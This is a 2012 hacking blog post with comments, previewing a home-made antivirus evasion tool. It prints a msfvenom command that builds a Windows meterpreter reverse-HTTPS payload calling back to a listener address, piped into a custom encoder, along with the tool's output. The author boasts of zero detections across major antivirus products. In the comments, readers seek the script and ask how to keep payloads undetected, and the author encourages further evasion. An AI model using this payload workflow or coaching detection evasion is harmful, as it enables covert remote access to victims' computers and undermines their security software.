Skip to content

Antivirus Sandbox Evasion (part1) – Preview

by foip on February 28th, 2012

Hmmm, it seems that I wrote something very nice ..

$ ./msfvenom -p windows/meterpreter/reverse_https -f raw LHOST=172.16.1.1 LPORT=443 \
    | ./ultimate-payload.pl -t ultimate-payload-template1.exe -o /tmp/payload.exe
[*ultimate] Waiting for payload from STDIN
[*ultimate] Payload: read (size: 367) 
[*ultimate] Payload: encode (new size: 1161) 
[*ultimate] Template: read 94720 bytes from file 
[*ultimate] Template: found pattern 'MY_PAYLOAD:' at position: 36928 
[*ultimate] Output: add the begin of the template (size: 36928) 
[*ultimate] Output: add the encoded payload (size: 1161) 
[*ultimate] Output: add the end of the template (size: 18502) 
[*ultimate] File '/tmp/payload.exe' generated (size: 94720) 

WTF is that ? “That” is my new toy. An Antivirus evasion tool which bypass signature, heuristic and … sandbox  detections ;-)

Tested on VirtusTotal.com (zero detection over 44), then on Virtual machines against:

  • Avast
  • AVG
  • BitDefender
  • Kaspersky
  • McAfee
  • MS Essential Security
  • ESET Nod32
  • GData
  • F-Secure
  • Panda
  • Sophos
  • Symantec (of course)

So far so good. Let me play a bit with it. As soon as I find an other (private) method, I swear to release this one …

Stay tuned ;-)

1 Star2 Stars3 Stars4 Stars5 Stars (5 votes, average: 5.00 out of 5)
Loading...

© 2012, foip. All rights reserved.

From → Hacking, Metasploit

14 Comments
  1. Great post !!! Pls keep sharing — TKS

  2. Alek permalink

    hi were can i get your ultimate-payload.pl ? for testing ? :P

  3. template Work?

    • foip permalink

      The perl script use a homemade encoder, but the important part (for sandbox evasion) is well in the template.
      I saw on your blog that you also had fun with this exciting challenge ;-)
      Cheers.

  4. Tommy permalink

    Well done that’s a good job.friend where are we to insert the payload.is it at Dos command prompt or at config.sys or metasploit or other?

  5. Fahsto permalink

    I can’t execute line code below on backtrack 5, problem with ultimate-payload.pl
    can you help me please

  6. exceed permalink

    You should keep it private. As soon as you release it will be added to AV databases.

  7. fiu permalink

    Virustotal 10/42!!!!!!!

    • foip permalink

      Thank you for this update. Glad to see that AV vendors are working..
      Since the tool has been released, the score can’t stay eternally at 0/42 ..

      if you want to reach 0/42 again, use your immagination ;)

  8. hatboy666 permalink

    Hi
    payloads created with your template are now detected with antiviruses :
    ———————————————————————–
    Agnitum Backdoor.Swrort!Ar5xwgxMbks 20121008
    Avast Win32:Malware-gen 20121008
    AVG Generic28.CKZJ 20121008
    BitDefender Trojan.Generic.KDV.673845 201210078191
    Emsisoft Trojan.Win32.Swrort!IK 20120919
    F-Secure Trojan.Generic.KDV.673845 20121003
    Fortinet W32/Crypt.BBCR!tr 20121008
    GData Trojan.Generic.KDV.673845 20121009
    Ikarus Trojan.Win32.Swrort 20121008
    Jiangmin Backdoor/Bifrose.xur 20121008
    Kaspersky HEUR:Trojan.Win32.Generic 20121009
    Kingsoft VIRUS_UNKNOWN 20121008
    Heuristic.BehavesLike.Win32.Suspicious-BAY.K 20121008
    Microsoft Trojan:Win32/Swrort.A 20121009
    MicroWorld-eScan Trojan.Generic.KDV.673845 20121009
    nProtect Trojan/W32.Agent.117248.CS 20121008
    TrendMicro-HouseCall – 20121008
    VBA32 Backdoor.Swrort.pt 20121008
    VIPRE BehavesLike.Win32.Malware.bsf (vs) 20121008
    —————————————————————

    Can you tell me how i can edit it to prevent antivirus detection
    thanks.

  9. sandbox permalink

    Nice work, thanks!

  10. ctg permalink

    Very nice but the worst thing you did was upload it to virus total. Always test in a virtual machine and multiple AV’s.

    • foip permalink

      ;-)
      I know. But managing 44 AV on virtual machines was a bit to much for me. When I find that my code works as expected, I keep the concept and start a new one.
      Thanks for reading and commenting! Cheers.

Leave a Reply

Note: XHTML is allowed. Your email address will never be published.

Subscribe to this comment feed via RSS

© 2010-2024 Fun Over IP All Rights Reserved -- Copyright notice by Blog Copyright